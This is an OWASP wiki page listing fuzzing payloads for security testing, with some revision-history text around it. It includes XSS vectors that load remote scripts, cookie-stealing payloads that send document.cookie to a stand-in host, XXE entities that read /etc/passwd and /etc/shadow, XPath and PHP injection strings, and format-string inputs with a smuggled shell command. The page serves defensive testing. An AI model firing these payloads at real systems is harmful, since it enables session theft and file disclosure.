''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".'' <br />
<br />
=== XSS Discovery Statements ===<br />
<br />
Discovery Statements<br />
<pre># Discovery Statements (July 2007)<br />
# Statements used to cause exploitable errors<br />
# Foobar@email.de<br />
<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; <br />
'';!--"&lt;XSS&gt;=&amp;{()}<br />
</pre> <br />
<br />
Common exploit code <br />
<pre># Best Statements (July 2007)<br />
# Statements covering 90% of all vulnerabilities <br />
# Foobar@email.de<br />
<br />
'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='<br />
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="<br />
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'<br />
'); alert('xss'); var x='<br />
\\'); alert(\'xss\');var x=\'<br />
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));<br />
</pre><br />
<br />
Full List - (Update: 11 August 2009 - Total Statements: 162) <br />
<pre># Full List (July 2007)<br />
# All Statements - Full List <br />
# Based on the XSS cheat sheet <br />
# http://ha.ckers.org/xss.html<br />
# Foobar@email.de<br />
<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"<br />
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;<br />
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"<br />
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"<br />
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
"&lt;IMG SRC=""jav"<br />
"ascript:alert('XSS');""&gt;"<br />
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"<br />
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"<br />
"&lt;IMG SRC="" &amp;#14; javascript:alert('XSS');""&gt;"<br />
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"<br />
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;<br />
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS')"""<br />
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;<br />
"\"";alert('XSS');//"<br />
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"<br />
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
&lt;BODY ONLOAD=alert('XSS')&gt;<br />
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"<br />
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"<br />
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;<br />
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"<br />
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"<br />
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"<br />
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"<br />
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"<br />
¼script¾alert(¢XSS¢)¼/script¾<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"<br />
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"<br />
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"<br />
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"<br />
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"<br />
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"<br />
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"<br />
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"<br />
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"<br />
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"<br />
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"<br />
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;<br />
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"<br />
"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"<br />
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;<br />
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"<br />
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"<br />
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"<br />
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"<br />
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"<br />
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"<br />
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""h\ntt\tp://6"<br />
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;{document.write(""XSS-XSS-XSS"");};"<br />
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"<br />
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"<br />
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;div style=""behaviour: url([link to code]);""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt;"<br />
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"<br />
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"<br />
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"<br />
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"<br />
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"<br />
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"<br />
&gt;&lt;script&gt;<br />
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"<br />
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"<br />
&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;<br />
"%3cscript%3ealert(""WXSS"");%3c/script%3e"<br />
%3cscript%3ealert(document.cookie);%3c%2fscript%3e<br />
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E<br />
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;<br />
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert<br />
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;<br />
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""<br />
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;<br />
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;<br />
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"<br />
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG%20SRC='javasc<br />
"&lt;IMG%20SRC=""jav"<br />
"&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"<br />
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"<br />
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;<br />
&lt;IMG%20SRC=javascript:alert('XSS')&gt;<br />
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E<br />
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;<br />
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}<br />
'';!--&lt;XSS&gt;=&amp;{()}"<br />
</pre> <br />
<br><br />
<br />
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===<br />
<pre>Statements<br />
count(/child::node())<br />
x' or name()='username' or 'x'='y<br />
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;<br />
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;<br />
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"<br />
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
</pre> <br />
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===<br />
<pre><br />
# Full List<br />
# Format String tests to determine errors in variable handling<br />
# Foobar@email.de<br />
<br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;<br />
</pre> <br />
==== Project Contributor ====<br />
<br />
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] <br />
<br />
Reviewer: [[:User:eneves|'''Eduardo Neves''']] <br />
<br />
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] <br />
<br />
==== Feedback and Participation ====<br />
<br />
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org <br />
<br />
==== Project Identification ====<br />
<br />
{{Template:OWASP Project Identification Tab<br />
| project_name = OWASP Fuzzing Code Database<br />
| leader_name = Wagner Elias<br />
| leader_username = Wagner.elias<br />
| mailing_list_name = owasp-fuzzing-code-database<br />
}} __NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=80303
Category:OWASP Fuzzing Code Database
2010-03-22T17:11:02Z
<p>Foobar23: /* Format String Statements - (Update: xx/xx/xx - Total Statements: 28) */ - marked my contribution</p>
<hr />
<div>This database is a collection of several statements used in code injection, fuzzing and brute-force approaches. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. <br />
<br />
==== News ====<br />
<br />
'''17 March 2010'''<br />
<br />
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)<br />
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)<br />
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)<br />
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)<br />
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)<br />
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)<br />
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)<br />
<br />
'''16 March 2010'''<br />
<br />
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) <br />
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)<br />
<br />
<br />
'''02 February 2010'''<br />
<br />
*Created new Category Lotus/Notes Files<br />
<br />
'''11 August 2009''' <br />
<br />
*Created new Category: XML Attacks<br />
<br />
''Update Statements'' <br />
<br />
*15 new XML Statements <br />
*93 new SQL Injections Statements <br />
*67 new Traversal Directory Statements <br />
*Deleted 33 duplicate XSS Statements <br />
*30 New XSS Statements<br />
<br />
'''7 August 2009''' <br />
<br />
*Updated the objectives of the project.<br />
<br />
'''21 July 2009''' <br />
<br />
*Set the team responsible for the project.<br />
<br />
==== Goals ====<br />
<br />
This project intends to create a database that brings together all tools which are based on wordlists, such as Webscarab, JBroFuzz, Web Slayer, Dirbuster and others. In addition to the current tools developed by OWASP members, we will create a database in a style similar to the Open Vulnerability and Assessment Language (OVAL), where any tool can adopt and use an XML file maintained by OWASP. <br />
<br />
In addition, the following functionalities will be included in this project: <br />
<br />
